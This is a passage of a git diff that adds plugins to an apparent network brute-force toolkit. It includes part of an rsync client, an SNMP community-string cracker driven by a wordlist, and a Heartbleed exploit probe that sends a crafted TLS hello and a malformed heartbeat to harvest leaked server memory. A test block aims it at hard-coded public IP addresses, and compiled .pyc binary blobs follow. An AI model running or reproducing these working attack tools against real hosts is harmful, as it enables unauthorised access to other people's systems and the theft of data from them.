CRLF: line = line[:-1] + return line + + # Internal: get a response from the server, which may possibly + # consist of multiple lines. Return a single string with no + # trailing CRLF. If the response consists of multiple lines, + # these are separated by '\n' characters in the string + def getmultiline(self): + line = self.getline() + return line + + # Internal: get a response from the server. + # Raise various errors if the response indicates an error + def getresp(self): + resp = self.getmultiline() + if self.debugging: print '*resp*', resp + if resp.find('ERROR') != -1: + raise Error, resp + else: + return resp + + def sendcmd(self, cmd): + '''Send a command and return the response.''' + self.putline(cmd) + return self.getresp() + + def login(self, module='', user = '', passwd = ''): + if not user: user = 'www' + if not passwd: passwd = 'www' + if not module: module = 'www' + + self.putline(self.server_protocol_version) +# self.putline('@RSYNCD: 28.0') +# self.protocol_version = 28 + resp = self.sendcmd(module) + + challenge = resp[resp.find('AUTHREQD ')+9:] + + if self.protocol_version >= 30: + md5=hashlib.md5() + md5.update(passwd) + md5.update(challenge) + hash = base64.b64encode(md5.digest()) + else: + md4=hashlib.new('md4') + tmp = '\0\0\0\0' + passwd + challenge + md4.update(tmp) + hash = base64.b64encode(md4.digest()) + + response, number = re.subn(r'=+$','',hash) + print response + resp = self.sendcmd(user + ' ' + response) + + if resp.find('OK') == -1: + raise Error, resp + return resp + + def getModules(self): + '''Get modules on the server''' + print self.server_protocol_version + self.putline(self.server_protocol_version) + + resp = self.sendcmd('') + print resp + return resp + + + + def close(self): + '''Close the connection without assuming anything about it.''' + self.putline('') + if self.file is not None: + self.file.close() + if self.sock is not None: + self.sock.close() + self.file = self.sock = None + diff --git a/Bruteforce/plugins/rsynclib.pyc b/Bruteforce/plugins/rsynclib.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e5cd24376e15bb841e86dcdbbd22d968fb370818 GIT binary patch literal 5937 zcmcIoO;a4n5zU@YW&puTmXN$3YI|3q5sN^Mkk+=sUkCw`g}`o*y*s-R6T@^dG|Y6P zt{x#A=pyN4AN)6bup@kMIDB{b>>smN$I97-hSD zazJID@`#M$C~LJAsS=}73N^3dO?v0O=*oZIyy;L^ z7Vb~s`#Tyy3URUzh%U43padR(2+q0>&~7PQfY>8Wz%4B5{0E95#tR$=GwqcWeaulC z>;Pmmz|Puem9<-zJ!i1$u#13%A>7h69jucpsmZu@5v66h%Kk*&-)sHY6H}d9#)I5ulfz=moi~TLCeaQiSWUB{pQr=bq_c0bjNIVjzLjf_ zKyrSF2|9D9-H&=lDzv?$zR_>*o1LgaaLc~^Q`jae>(|}{LDPhe3NxfR9bhZI>8t% zrYEps@2H5II4jt*b41HzEnQ9V`GO+^Q7Yetn}<8#&O~NjX#9eCNhTnTYh;gAJY0Q1 z(oi1Q1LZni4q*?a+4YELxn*uL3kYY`v($0dR)Y628eBxB1Z+(l;$%Cue|ljrip`mA zpD_U~D02r*O@G9zds8yub*LzT7_sM{(c#9F?A#8q`57=7zyKY(y}Ad4x@9RUg zlH<%A@JrCW3&-mxIMB1*cI;mZ{q3X7SZ50`!>qEArkxFPP;dp6k_nQIkQk|1`t9f1 zCM-P@Ys#jU)2YiFE1Fs=?<@stD<|d)zK=J~)O1jqs`Me(@rHK=OmPWZG2vCD=1t3_ zmXRrGQsoVjoHOMsq4j{}Fd5*S;0CJym*!+pXx>Kx6;XZYA(pN!PJy4yeyYy{5od>+iQVl?K* zM;xk|PY}^@zJFHs48DuiUZPmSLnLa5!HeER;oB_4)5{@(T_LJGcF-cnD7#$8giWxA z&pcUqIH%!kkj8o_3>kUeZRtb2pcI|8n8nQl)S}52k}&&$c8i*mfhKNhcSI--k`p{YJKA{x+v^|57+eIn;2$$rU%2E9 z{8WOXyqgCfvU-=*0;@Sz@1asF@3!qO?z8#T{f=g6gM$zkH*IdWt@-43 z#^tv^xozT361oRr)HS$IaQ)aEx)jkRaCWfmh*me`5;4shd430~(M_&SnVnr6nz(G6 z;0}lARaD4rlCrb@LC)$fD^aE5L4Vt%XXWfc9qarN#m=J=C1VmYN@2P@O} z(eF}UHLxZn&XQ_Vn)8GN0-}0Wpy-Da5dUNSa$^5N1&Nas#=L33PFQe zeCuwDIn^PM_iK{Q=`(y(L!biXJnzz+gO4BSV|*hUJ;r+_V26txYn|xQGW#R0*h_GE z*AEG!uM2v4N4o3d3&EhzEV>;ZWxLwg=6ICNE0F6A=5#JFG;z>_CPC7`@eW06YNrgX z9(-1~2KTYRKTzD!0ZQdvfn~kHQzcNvc;abvwpwA*X|-IkNq$hf1e>3&FSUNP5p3xt zOlLk`{B-T%`f_lMLTC=%fTl&xW9VZ6uV;FF39h20yVY#kL2-jm^*B{klr3oV;2tY# zegcEG-tN0VK+ho?S*}?btKfUUsox61u6q7Lty(G8sxDaQD;cB1Z6`vWPshCRGsGG-A0{t`vZJ@lt83#Q*;VEu7L( literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/rsyncs.pyc b/Bruteforce/plugins/rsyncs.pyc new file mode 100644 index 0000000000000000000000000000000000000000..11bd951e974b210055e87278598c737faddb7f91 GIT binary patch literal 9732 zcmcIq&vP3`dhG!~P=H90BK6b1G>WY?Ow*KiV>=sVW3MDilvXln52a`guY!OxLvl!9 z08I}>vP!zFw3peZ8@()5&d?xVwLtOS>JYyn!J<~C!Im&yc>8ZYCIwjLB zn`YT`E2dd7-3im2Fdm;Nn@-hqCrxwGc(G@8j+v-po_X#jI;@#yZPC-ZbY;jMOt<&a1L&I-cpCGR;$1$0>uQv`(2XPhsHK zM+1K!;|>RwaM&q@FsX-6o91b(`2-%=lQquMvQb?c2&*vsT= zd{!G}Wb+!5ewL*9XGyx79~+i}ILhn8!b%p$X#@Lj@(PmAdc97l;vMjyCalPGM( z`R1djXnPhFt(CiL*RI}eE#J6#_5R&^t$VjWy|H%xUQV^j>_HkP2|7uP&jcUcxRGVO zEM$=%j(ZK4<>X@QnP-Ca2J)s+LZUghT4}o*w_2KWtJUpAgAR(Wm6|fKzk}rReH&-? z@?O%hz4UU9wb;v>ak{lVXs25?Y^Q0QwJ!HNgRLaBmo-Pb)ISI~I{UL6wCaAQ>z1>t zkLF4lXs-W?jGHUAzFDH|VHi<~h7rRsswRdxVCQC~?nsX-KgBlVZ`s7q^@@33rK++X zdNE<5s(B7Qn4wZZN1*yKdN@f{U=hk*QwC~LSLPIzi?>cwznFpQjRu0Ep*N`E3EhGw z&M0%9fLn);H4A9j*B&GFN=cBx+X@wwOY!z^y+vETN?9z+=CNiSXW!*-|R z=i9Ms>3m^*Pyg zN8_ufelN>MBe@=&c0vqB8XIz_c~x*-$7Syzc~Uh`p!3LhCR<^C$77yQ_oSq%veL@% zcFCarN!dIB9+r*wXvL(0)^*ubVWS);Pr7k$kmt-7^Ovo3deGB`T5u{{pNy2U%&Vwz z;#3_asyZiB)p4o86xxk#vIu*M`!@>c6MCq$qyrJ7guroA~YIsZRje;snByvn#F zyuU*Ra)Ng6LO|!3cY=g8ARwsfE=2aegarY6loF&CmDT>1B#8PF>w!u;70DiLv;&(E zF)}6dOqte%iW6qXZP(7cGPa!mb*J}!-jgCN z`To_Ric?p|YVNE!#+b4G+-_v1VqPifUT_!_1^ z8ce=dl6Nq~MI4RL^AnU+oVPTVq!Y1*A~e+(h5fszhOl#E&OQ}v0CNc>0E|mSjuqTo zxkbPb2J8TA9U`OGb&;UegkIc|lPo}h3(_hn?cJNfMbrl8kqCNioJR0zhgMGw>?CP? zM2n|2U=HjNQ+A}scy({aOnD)vNimFY^Dj~0vIKK(eOUTg_#21%`5Om$Y~4-(6BdL+qN|N#Xdb+dL@)xf5m83k zlx}-pd5WbIr=n`wH#NPnc2k5>h;u!-dvm;b!FTY)5pEo&%!v%pt3wR$JTT%6P-4of znwmFjrge=rk{c?-AbPotd}g?JkmQg8uubqDlK-E1)AwWEU67`PlYfq~rBWMAdNfgL zohJGtWWF&`sa|%G%5zv};BBF2P_V*BUn|t{r|{A6&RCwzj{~h*`p^Z!(SqauL9iCM zUFZE^i3#nna2jdk*f=NUAc)QQ{L$=X@CLg3V_cTPp&V+kzSG`R=|%LR$8z$(ny_4t z1>}e=+&TL;l69blPi8FiExUV7%WtXocPAXqGnuGW7VToFb)X zO4FWr8JElo?eR>%ln#BA&Dkdta1UsXhtOS3-4#8c>QE24i!V&_F!f}Tto$b>^R#ZBItqxzK(lM; zu298=o)x2}=o;E}-P4 z<@hzWjO6#o}l~*0MMuw@CJ#cl!mJJ0_w@rGxH9oE?p-2PZJfSGX)O#0Z25#JEbc z<(bmi5}|n-f9H@pf#1`mSG}_(*!pk4KFZeF`pPY5=B_j}dnkrebm2GJ5X1>mmi%D_ z%+DRhtlx8%@2IY}S41SxK59p~nPUKuOpit+3XuTtKUIvx{w=5H&S=NHSqNdmEu7lM zExOM8IMEghcMB{)4o19NGufiGL3KbA4=88ZWvdnS!dAh;!V zYr#DoxYY8~t3SSbd-X=}4xe9PLR}IOa@s=Q8JuRKxpxi(pwsa0#oY7=vB)Q(F6 z3NW=c23bGE!}?GWui>&EA{m9$o+E@Mb7MyCgc+z(S&=JnSp>~cQ)LKCTTeS2UQ%i< z9u`U!gvg-2pes_{R@rR146q%VjIX#c%$$v@+`^(I+zTB&`(1^TRA^??1q~Tx+H7#! zg=#D%TY|-Wo9q?3D@44@vvLK^I>SRV_yEY5n(~1By-ors<{C)Pta6_Z;z2A}2It}E zjs{Uy;dn1!Y8$Ci|BlOngI9wx*T8|qfH+-_Dmi`!8OIKA1S>o}P9BKDKwhGN9t)+R zoD#G*4(_Nb!JAA7eBVCIUqqd}-Vr$i*%OeD5rzLi-wG(hC&&YY6fk%27%r{rA0bVy zYr-7-nE-FJI%t5@h1ydwh%N!ppm@(b4-5pHf&9k3-(Ues1daj?5^Vt;;qlCaQh6%E1~+3+iG|F2lH{P53*Tt`d@n(iTrjOUBxmdzRG{&4#Q z4Z+K2hWn1N7;0xpgE$2gA(?5>H&cE(Z4fisL3A422(MpoejIpgKd)X8bcU?qJ&H!N z!$!a2`wZNA^ecWJq*aOykU$pRjHd|R|&T^ z36Ut4Fbv-F1%wGcVl^B5P$;~7#S*qR6A<@Hw(#42f-@>&CppsKo1{lan5BiaJ4*{L zn82{w(!%|8H|_1EsHC|x1k+z27x35+FsLNc&*JcLaET>qA;W)t)idbpsycDpce#Ei z$;I*nEA4(CXN!PP8!%8M9dCyUA1R;3ofs@ns4O-Vd@^jt#ety70SIkw?1vZyv9^Yo zB@wa!c4XCz;+kE)*ehZmnI@CGjJg=Y{; z$2hMKI|P7n9Cr>9lDoNWRt)1tYNity&q@Es{qY!&00M4M*Duh?!3kE2SDFQ)jM}65 z183fKnfJD!)dQS5^On~on_88&T#=E>@MO)FwzSz!Iu|c)w8QoQA$vPWbmyoAZ00<4FFWO7+hI-ALpWZ5jXPXGjhM#` zIL!*z>IeudZ2ut@jvXvN{9LAmAcJTk^%5pCLF|O>pilmPf->+k=YfpB;l?pd1g`&? zDS40Xng`Hh7e(-xgR{lrq2!0B1}{3A9c<|wX1jmIAl|^mVG?kOIzBEx^cl)P1c7c; zH=y|E=}mdU!g&7;-&edQB*3i--7OE_Vb%_J3k5|;e{X4NNr%rb7arneX&bLKztQ57 zb^0(!LuK%G)dqd^Gd8G0kN5gT&(LA2FcjD>qA@!^+--#O)?$*&Hg0s@Dn6*b$Ex|je|0aR4}-@&Oxiqe;NoZD|rXLQl_E;-f%c) zMt-`}L$Qj?eufwOaX@R4=x%;;jgp<*G5hZ0zXk$Y znb0R`Am>c!rL2hS$p-0Lv>uWV1KUC1A7RI-(n)U(dHSCD(rcdH_l}R0?)WEOA;h3` z0w~}i^VSq!W_H1+=?-$;)+B|hWtpHoCvT1}NYZ6zv@RBE*SKqRQS3#TJ}35q*mX&Il0e~#95;>0 z)y?g}DqK!~#_!&s0nvBRlvSGh`)R)Gmrr{iR@UYN!xe0<)M5+b{i4X~9>e(Hab=^# zFF|y(N8zJ+RXzVvHPh1@3xvj#@GMi7*+^MbQfkrtD(>(QI*rj%cT};QU z;Ej16eW4i|udg5=3P&wDxGo-YgW)@F$kBovF31$o!AO%MhJ6jE0S?&lFn?ECzA3xQ zQhh1rsEs8EYm1RZ&`p9!pY9(wW#hw-PNv&Bog4Y$u!W%0n0qN2apcyO?N8p{z8idg zHvpS4_5zw$Tpw8UUvvFe+--ES0zUW0QJVE@YzP_leNZ4Mu}_PD-6LqI(C8G4K!lfrU^_}%`*O0OwU{}YbNITbcnCw`)>#b-^u>BC#1i# z^Nk!ei7240=?};+0nPs#YGMck0Gi4Nzy$D*aT9?y@={NyprfToA^>Mt>(X&cHkhKQ zp)J$J-hmI6}_O!6%FrgWlT+xtMKxKB9RA0`i~>m z-?P!K&HJY)z5MbU^-mepTON>W0k4SS=gKVg!HXOtErN?|$iIN=ltWQj+B^xKwLUv%gTFY5@;c%{u;G01GagKH4rA5pyYB z;j3JD3GU#E<4ywjOMs`kY!FJ|PpAMbm_Ef-7hYA$dfCAPIK&iyG|`s*ol^yOc0QG( zML7h%HU5fqg5?-o+mU__5c;<>Z)svIpTRnN(2WggT#gxuh5?oUoesnG(ixhS)F z0F5;_xv9=olmg}o&-?;jX9r>A4)QqoD+f8_d==1H?I4NP8?(Y$^=n$3B-Z^3#mMR< z30U>?^I)$^y$xCQ26~w^jdC_ElQi~q_C)2>lE_?D*HRa}N|{?UzG^T_R*BkI-!b0E z^jTaa`dH2LH+UBD7EPrqrrYQ?*33T|NUMz%v)*{o4Ad=_(J*B04@31a3};0$&(IB4 zFjuDzhA+5<=FCKu{%}1Hc#D~Vw2rqMopz_!Ij;eP0a2QVp`$Cq;ijV*TUUqIwzh^h zZw{~DzH#GbP37}Cu{FGQb!)hF>(=o4&GZ_EG}?}n*j<0EY7+!l_A*7z@bQzDRS{d~0QE4L&t?Zox`2>sMlBvqQPkAO z;4Ka+^A2hzmyv%QFwH4R<6<_`Z?SZuJPT-du*HVHC@E?DGmXB+`Ry9#cla5g_rHt$ Vx`C>@YF3*YZ?eZK+(Fxc{0pPGa*O}~ literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/snmp.py b/Bruteforce/plugins/snmp.py new file mode 100644 index 0000000..9405ee3 --- /dev/null +++ b/Bruteforce/plugins/snmp.py @@ -0,0 +1,65 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +from pysnmp.entity.rfc3413.oneliner import cmdgen + + +class snmp_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/snmp.conf") + + def snmp_connect(self,ip,key): + crack =0 + try: + errorIndication, errorStatus, errorIndex, varBinds =\ + cmdgen.CommandGenerator().getCmd( + cmdgen.CommunityData('my-agent',key, 0), + cmdgen.UdpTransportTarget((ip, 161)), + (1,3,6,1,2,1,1,1,0) + ) + if varBinds: + crack=1 + except: + pass + return crack + + def snmp_l(self,ip,port): + try: + for data in self.lines: + flag=self.snmp_connect(ip,key=data) + if flag==1: + self.lock.acquire() + printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) + self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) + self.lock.release() + break + else: + self.lock.acquire() + print "test %s snmp's scan fail" %(ip) + self.lock.release() + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + printPink("crack snmp now...") + print "[*] start crack snmp %s" % time.ctime() + starttime=time.time() + pool=Pool(threads) + for ip in pinglist: + pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],"")) + + pool.close() + pool.join() + + print "[*] stop crack snmp %s" % time.ctime() + print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + diff --git a/Bruteforce/plugins/snmp.pyc b/Bruteforce/plugins/snmp.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4e77b890bd411e316250bcf6b6569e3a73513529 GIT binary patch literal 3157 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 literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ssltest.py b/Bruteforce/plugins/ssltest.py new file mode 100644 index 0000000..207d91d --- /dev/null +++ b/Bruteforce/plugins/ssltest.py @@ -0,0 +1,145 @@ +#!/usr/bin/python +import sys +import struct +import socket +import select +import time +import threading +from printers import printPink,printRed +from multiprocessing.dummy import Pool + +class ssl_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + + self.hello = self.h2bin(''' + 16 03 02 00 dc 01 00 00 d8 03 02 53 + 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf + bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 + 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 + 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c + c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 + c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 + c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c + c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 + 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 + 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 + 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 + 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 + 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 + 00 0f 00 01 01 + ''') + + self.hb = self.h2bin(''' + 18 03 02 00 03 + 01 40 00 + ''') + + + def h2bin(self,x): + return x.replace(' ', '').replace('\n', '').decode('hex') + + + def recvall(self,s, length, timeout=8): + endtime = time.time() + timeout + rdata = '' + remain = length + while remain > 0: + rtime = endtime - time.time() + if rtime < 0: + return None + r, w, e = select.select([s], [], [], 5) + if s in r: + data = s.recv(remain) + # EOF? + if not data: + return None + rdata += data + remain -= len(data) + return rdata + + def recvmsg(self,s): + hdr = self.recvall(s, 5) + if hdr is None: + return None, None, None + typ, ver, ln = struct.unpack('>BHH', hdr) + pay = self.recvall(s, ln, 10) + return typ, ver, pay + + + def hit_hb(self,s,ip,port): + s.send(self.hb) + while True: + typ, ver, pay = self.recvmsg(s) + if typ is None: + return False + + if typ == 24: + if len(pay) > 3: + self.lock.acquire() + printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) + self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) + self.lock.release() + else: + self.lock.acquire() + printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) + self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) + self.lock.release() + return True + + if typ == 21: + return False + + def openssl_test(self,ip,port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sys.stdout.flush() + s.connect((ip, port)) + sys.stdout.flush() + s.send(self.hello) + sys.stdout.flush() + while True: + typ, ver, pay = self.recvmsg(s) + if typ == None: + break + # Look for server hello done message. + if typ == 22 and ord(pay[0]) == 0x0E: + break + sys.stdout.flush() + s.send(self.hb) + self.hit_hb(s,ip,port) + except Exception,e: + #print e + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ssl']): + printPink("crack ssl now...") + print "[*] start test openssl_heart %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + for ip in ipdict['ssl']: + pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop ssl serice %s" % time.ctime() + print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ssl': ['222.22.224.142:443']} + pinglist=['122.225.81.129'] + test=ssl_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") diff --git a/Bruteforce/plugins/ssltest.pyc b/Bruteforce/plugins/ssltest.pyc new file mode 100644 index 0000000000000000000000000000000000000000..00cfc1c8f07253aff22a6729544162233f3e9e72 GIT binary patch literal 5557 zcmb_gU2_}d6+SB|vL)Mbh{*@Eg|`$KmjPRnmBh|;n1qlJ3N>M!5~?<%u6I|~+N+ha z?~2$nc5lK@==({^wHt-rxT9 zMJSWMDxSCSwG~e!!pDj9=p3&P7SUswR7&b-CVIk!XRP&dU;m?M3eDT$1>b>|d66MdFtwT9gRK zotI~2&&yQ#oz-PnBl$1>wpUAN7B!Gjo@B*?Bs(bPr#(N8R$($JDj*Mr!&IlNO}o3} zd^EE!S$u%6{Ur!=aMpynG^IzqX-Bln@-^gx9Vpkj#_)5>3NyS@v9`!tOrUdo&2As?!lHb|W}SWM{PuZriqnN8L>R zn%7NZ!!%l^(J&?oO{2*cKGEi6;@ZY+aeKpD+cjGavlW@GU2_AwcFk^ROe5r@g}Igq zHcfleY~3(nZ?X{oiIJdE3qPB@*oIcwKL9SmnVZ$`B z7jgxpt(MV;ib}o>vjJ%vW^?n~8#f^Ww)B+ZIIOw`QL#*UHCsBdN!ko&8`<0CD#{7E zp{pW2k(QbYF`3wUZlj*nqz2T66r$p>6)06v+bT-C{q2p7SWjtlRja3Kuj|HkQ^ix- zaQZwas&iaJS;BjmJuRjj5JsSpD7U$jdQ99mBGP@3x zD`H!$jgA!by4@s8if(rajO=+b_G;d;S1VO7ES9R}8B7sR?r_apAb_cTMO=X2vy!$I z2-yaLSBOPBt5juMB{l_`VkvyRAg6wO=oFhnCyz&I5XNecC=Q2FtaJV%=5+hv87b^D z9lV3DrESGa6o_eC9z}6g!@r;bfuZ3us9KgQCqQ;jPR_}3NlvPA_>CL`*-LUzk^Ikc zTsd8R^<++tfxwu9UY{rw!;ye;m<;(0IF1kU#j}e1t}G|>a#E9%y5j!498@KLU5#7j z2{7Wxf*dc1{i8BEh5!q4gK|`vy3oOrO-S_Qb$%XU!Okkx+4e7hCiqH1wbT_FcttXZ zwXr?SoW&7VaaibB9*1A4d(t>trAba*VAVSq-z)kBokm8(aiQ%viq%A=qNCZRnD zCIOx6G~J)8L!T;jf^hvA`B#OZ5-#c`whCC*)g1*G3qCuje!%U7u4NqenSsEUN z$EwmRPj7~L#`4_vKe&HCsiWbt_V%_q(SHjg{$&s~r!Dd^{6x?gXQLoISf$wNA^%k_ z(t8!<`Yet{`ur-+6-UxcyQARftW7usds<=sn`UvhWO5b%q<))|{drzo5BLl7 z!#}WnuOydoSM->=>@R%(47M)n*6jXwS;2ch!0P*EW~`u|3Vlw6UQs2UtjME?MH-#C zom>S?=so*6$fMi-_Q%^F-864m1FSYd!B!p@<2;KaGZ^Nv;hix>Kgdi{7~3C?)5yGM zkOkmxlUVcBI0fbhyJ`H>rMi6puFo+W<-;(xmfV80H_QiU_2VEfcH^LU*X)i96D5(! zhQ;Ju6J$pwJ}mM;k6v4k8 zT+ICni+aW^LUkWe4eTf}W*M^InMZ~J6U6w7lZRjOg(v^3&LgJ)dpt#^7cLVn+&A(7 zuS};LP5KAfq#W}ACr*Z@EyhquJRElLes7qe; zJY+>L^W;kndIH0CLR@nRibcmN^Ob`+R7SB&E4S};KiNDi1n|dqqW-I!!RBd$uQGO z&LL}?8?TWNV_yh0|7RFGt9T=T4iWl%3uS@!d-Nw!S4PY&c`Nu{z;_yfZ+P=Mas}xu zqycJ^uSVT#h&lutLJ4?DpXRT6$hvSa;|30P84N*p`J?-6V?vm|aIakCu+n)vW$@wS z&xN&3RbM}`1U^T&V7V4N;E9OD%PxawPF{gMzh`1z1z}uE$$RoC3Kp=d^IVTDlrw1I zSAcJehMxmw(jlQ<)qWcI2FGYAlCKNzsn;; zz6K)EYuiPWP3=qQg*o!7qAtMi>Dtp7Qfuq~dR6l&I&n~6(W<4| zPimFLi?v$qO6|%-OcvYSuI0kDwRQLN7Gv)ndl9tNYOU#~z1D2EZnoPS{_QEdrcPX2 z+ib2iTU$vBNHlR^0+;{59;2$JwZfwJKW|bhD*ylh literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/tomcat.pyc b/Bruteforce/plugins/tomcat.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f78b1bdfb5e9ebb7eea3f55f1fdc36e0a1fff4a6 GIT binary patch literal 2789 zcmbtWPj4Gl5TCdH6Wg(qme8bWRq6maiC5-nfGSiym|BIH!1zmYW(P4Jqc<4 